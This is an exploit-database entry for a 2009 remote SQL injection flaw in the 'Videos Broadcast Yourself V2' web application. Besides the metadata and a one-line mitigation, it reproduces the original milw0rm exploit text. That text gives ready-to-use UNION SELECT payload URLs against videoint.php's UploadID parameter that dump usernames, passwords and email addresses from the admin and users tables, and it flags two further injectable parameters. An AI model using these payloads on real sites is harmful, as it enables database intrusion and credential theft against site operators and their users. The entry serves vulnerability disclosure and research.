Remote SQL Injection Vulnerability ( videoint.php UploadID )

vendor:

Videos Broadcast Yourself V2

by:

Mr.SQL

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Videos Broadcast Yourself V2

Affected Version From: Videos Broadcast Yourself V2

Affected Version To: Videos Broadcast Yourself V2

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Remote SQL Injection Vulnerability ( videoint.php UploadID )

A vulnerability exists in Videos Broadcast Yourself V2, which allows an attacker to inject arbitrary SQL commands via the 'UploadID' parameter in 'videoint.php'. This can be exploited to disclose sensitive information from the database, such as usernames, passwords, and email addresses. Additionally, the 'catvideo.php' and 'cviewchannels.php' scripts are also vulnerable to SQL injection.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

###############################################################
#################### Viva IslaM Viva IslaM ####################
##
## Remote SQL Injection Vulnerability ( videoint.php UploadID )
##
## Videos Broadcast Yourself V2
##
## http://www.videosbroadcastyourself.com/
##
###############################################################
###############################################################
##
## AuTh0r : Mr.SQL
##
## H0ME   : WwW.55a.NeT
##
## Email  : SQL@Hotmail.iT
##
########################
########################
##
## -[[: ExploiteS :]]-
##
## www.TraGeT.CoM/PATH/videoint.php?UploadID=0/**/UNION/**/SELECT/**/0,CONCAT_WS(0x3a,username,password,EmailAddress),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+admin--
## www.TraGeT.CoM/PATH/videoint.php?UploadID=0/**/UNION/**/SELECT/**/0,CONCAT_WS(0x3a,username,password,EmailAddress),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+users--
##
## catvideo.php?m=0&cat_id=0 << Vulne
## cviewchannels.php?uid=0   << Vulne
##
########################
########################

#########################################################################################################
#########################################################################################################
                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
                                        
:: HaCkEr_EGy :: Dark MaSTer  :: His0k4 :: MoHaMeD el 3rab :: ALwHeD :: Ghost Hacker :: MuslimS HaCkErS ::
#########################################################################################################
#########################################################################################################

# milw0rm.com [2009-08-18]